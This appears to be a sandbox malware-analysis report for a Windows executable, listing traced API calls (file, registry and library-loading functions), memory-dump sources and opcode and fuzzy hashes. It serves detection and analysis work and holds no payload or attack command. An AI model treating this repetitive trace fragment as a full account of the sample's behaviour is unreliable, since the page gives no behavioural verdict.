SetFileAttributesA.KERNEL32(?,00000000), ref: 004056F8

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: File$Attributes$DeleteDirectoryRemove
String ID:
API String ID: 1655745494-0
Opcode ID: ecb533084f054dec527d8ee4002c22eb7271b0964ed621fa894de998c2c2fbf7
Instruction ID: 7218464210d320bbb7aaa7b2b3498e6226de7d0fc9260b199a665c24177db626
Opcode Fuzzy Hash: ecb533084f054dec527d8ee4002c22eb7271b0964ed621fa894de998c2c2fbf7
Instruction Fuzzy Hash: 4FE0E53150EA9157C2105731990C75F6AD8DF86324F840E36F955B21D0D7B94C068EAE

Function 00402F5C Relevance: 3.1, APIs: 2, Instructions: 88COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00409130,00000000,00000000,00000000,00000000,?,?,00402F08,000000FF,00000000,00000000,00409130,?), ref: 00402F81

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 318766a007564a5c8c6069328ff7bf9d8ddc724485930b67641b25b8ac31027b
Instruction ID: 983d4f283b3a49842741e08d62faa859851885946f81c7e75766fedec90a3088
Opcode Fuzzy Hash: 318766a007564a5c8c6069328ff7bf9d8ddc724485930b67641b25b8ac31027b
Instruction Fuzzy Hash: 32319F70202219EFDF20EF56DD44A9B7BACEB00755F20803AF904E61D0D279DE40DBA9

Function 00402410 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C

RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402440
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 408be7f7af0432980abd1dac26f88ffd518e424ecbfe51417bc02b193546086b
Instruction ID: ea61b96732c3ecdd8e38099917432d45b641eb3d8d4d3075f09eb17731070f47
Opcode Fuzzy Hash: 408be7f7af0432980abd1dac26f88ffd518e424ecbfe51417bc02b193546086b
Instruction Fuzzy Hash: 7111A771905205FFDF14DF64C6889AEBBB4EF11349F20847FE141B62C0D2B84A45DB5A

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 6f3fd260d9a20665192313664cef065be83871c58b0681ff97f62226ed226405
Instruction ID: 8ec6bfb8ef4f3ff43576048fe9568e939b5e998f238dec90285f5c94a9fc96e2
Opcode Fuzzy Hash: 6f3fd260d9a20665192313664cef065be83871c58b0681ff97f62226ed226405
Instruction Fuzzy Hash: 2201F431B24210ABE7294B389E04B6A36A8F710314F11823BF911F66F1D7B8DC029B4D

Function 00402308 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C

RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402327
RegCloseKey.ADVAPI32(00000000), ref: 00402330

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID:
API String ID: 849931509-0
Opcode ID: 640ef84aaa5a4d1c7ae329859e4cea83c356e8d6a4fc0d45da6cfdbf294ae742
Instruction ID: 87e18c8b9cd74d0bde17796df308dc93964f3544418e05dee947639aacfbea4d
Opcode Fuzzy Hash: 640ef84aaa5a4d1c7ae329859e4cea83c356e8d6a4fc0d45da6cfdbf294ae742
Instruction Fuzzy Hash: 4CF04473A00110AFDB10BFA48A4EAAE76799B50345F14443BF201B61C1D9BD4D12866D

Function 0040514E Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 0040515E

Part of subcall function 00404094: SendMessageA.USER32(00010456,00000000,00000000,00000000), ref: 004040A6

CoUninitialize.COMBASE(00000404,00000000), ref: 004051AA

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: InitializeMessageSendUninitialize
String ID:
API String ID: 2896919175-0
Opcode ID: a1e759c3ba7025077e10085eb26d18bfe45318352d138b018d477bc6a8fcf70b
Instruction ID: 484cf87bc9531c098fcd3877696a47d73f7080a50005c66256059c60e8f5965f
Opcode Fuzzy Hash: a1e759c3ba7025077e10085eb26d18bfe45318352d138b018d477bc6a8fcf70b
Instruction Fuzzy Hash: FAF0F0F6A04201BAEA611B549804B1A72B0DBC4702F80813AFF04B62A1923D58428A1D

Function 00401567 Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00010462), ref: 00401579
ShowWindow.USER32(0001045C), ref: 0040158E

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 34ff18edd3c11d242e04e6dc0ee5230189bfa76ca485cef8dfffd048b0cc2ec8
Instruction ID: 7aa5c4f7886e8cba7d13c86f28d42bb7597e194b119905c56f16c38da31e44a6
Opcode Fuzzy Hash: 34ff18edd3c11d242e04e6dc0ee5230189bfa76ca485cef8dfffd048b0cc2ec8
Instruction Fuzzy Hash: 49E04F76B10104ABDB14DBA4EE8086E77A6E794310360453BD202B3694C2B49D459A68

Function 004061FC Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,00403295,00000009), ref: 0040620E
GetProcAddress.KERNEL32(00000000,?), ref: 00406229

Part of subcall function 0040618E: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004061A5
Part of subcall function 0040618E: wsprintfA.USER32 ref: 004061DE
Part of subcall function 0040618E: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004061F2

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 2c630675a567476a72db336401282eceef6d354bbdda173821c126d7c14613da
Instruction ID: 835994d0d4e2d07c36af23a3dc0c9bac066575a7a99d708227b603b56203bf9f
Opcode Fuzzy Hash: 2c630675a567476a72db336401282eceef6d354bbdda173821c126d7c14613da
Instruction Fuzzy Hash: 7EE08632A04111BAD650B6745D0496B73AC9B84740302487EF906F2185E7389C3196AA

Function 00405AD6 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000003,00402CF9,C:\Users\user\Desktop\lkETeneRL3.exe,80000000,00000003), ref: 00405ADA
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405AFC

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 4a69860c6089f1fb7fd455c1891d9cc54c05e48a968a67635bcc5e625bd0c43f
Instruction ID: 2e597581bf20324382b204af2e2b9293bc3b27f4d9e8cb915424ec39c2be7a6e
Opcode Fuzzy Hash: 4a69860c6089f1fb7fd455c1891d9cc54c05e48a968a67635bcc5e625bd0c43f
Instruction Fuzzy Hash: A7D09E31658201EFFF098F20DD16F2EBBA2EB84B00F10962CBA92941E0D6755815DB26

Function 00405AB1 Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(?,?,004056C9,?,?,00000000,004058AC,?,?,?,?), ref: 00405AB6
SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405ACA

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
Instruction ID: a7f0a3a241a8181cef173a1dc0fd71ceb180899bf82cabeb0f5c2b47daa9e471
Opcode Fuzzy Hash: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
Instruction Fuzzy Hash: 0AD0C972908121AFC2102728AD0C89BBB65EB54271B118B31FDAAA22B0D7304C528AA5

Function 004055BF Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNELBASE(?,00000000,0040321E,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040341B), ref: 004055C5
GetLastError.KERNEL32 ref: 004055D3

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
Instruction ID: ee333ff4e59061917a1f290c3015eab559b7a368ac9c9957fcbd809aee07952f
Opcode Fuzzy Hash: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
Instruction Fuzzy Hash: 04C08C31618102EBDB200B30CE08B073E61AB00381F208831A006F10E4CA349000C93F

Function 00402283 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 004022BC

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 4656573f168c310efd594f08e96abc660716981113b3fc3e41d9438b56e455a3
Instruction ID: ed5e863b5af70a22674a87f6432e4eb84017b1e79b4e81bbc09640d5f5368664
Opcode Fuzzy Hash: 4656573f168c310efd594f08e96abc660716981113b3fc3e41d9438b56e455a3
Instruction Fuzzy Hash: 8AE04F31B001746FDB217AF14E8EE7F11989B84348B64417EF601B62C3DDBC4D434AA9

Function 00402B44 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: ed1d997f1767e4ebe1524a955060e6e59f62574de8c72c2eb948d7caa6f8d669
Instruction ID: 806e3b40af95552ac91145e5354a2e2caa18036cb762c00ee55acc3717e10e35
Opcode Fuzzy Hash: ed1d997f1767e4ebe1524a955060e6e59f62574de8c72c2eb948d7caa6f8d669
Instruction Fuzzy Hash: D3E04FB6240108AFDB00EFA4DD46FA537ECE714701F008021B608D6091C674E5108B69

Function 00405B4E Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00409130,00000000,00000000,00000000,00000000,004128D8,0040A8D8,004031E0,00409130,00409130,004030E4,004128D8,00004000,?,00000000,00402F8E), ref: 00405B62

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: ffd4dfc917ffc97e7d907f9c2c90699c203f3b0ebfd4578ed28d6b2a376640fe
Instruction ID: c996f9a7b3ae33303237a126fc5a394e9691c2321a0fe14ef9137570749964f2
Opcode Fuzzy Hash: ffd4dfc917ffc97e7d907f9c2c90699c203f3b0ebfd4578ed28d6b2a376640fe
Instruction Fuzzy Hash: EAE08C3221465EABCF109E509C00EEB3B6CEB00360F008432FD24E2090D230F8209BA4

Function 00405B7D Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00409130,00000000,00000000,00000000,00000000,0040AAAE,0040A8D8,00403164,0040A8D8,0040AAAE,004128D8,00004000,?,00000000,00402F8E,00000004), ref: 00405B91

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
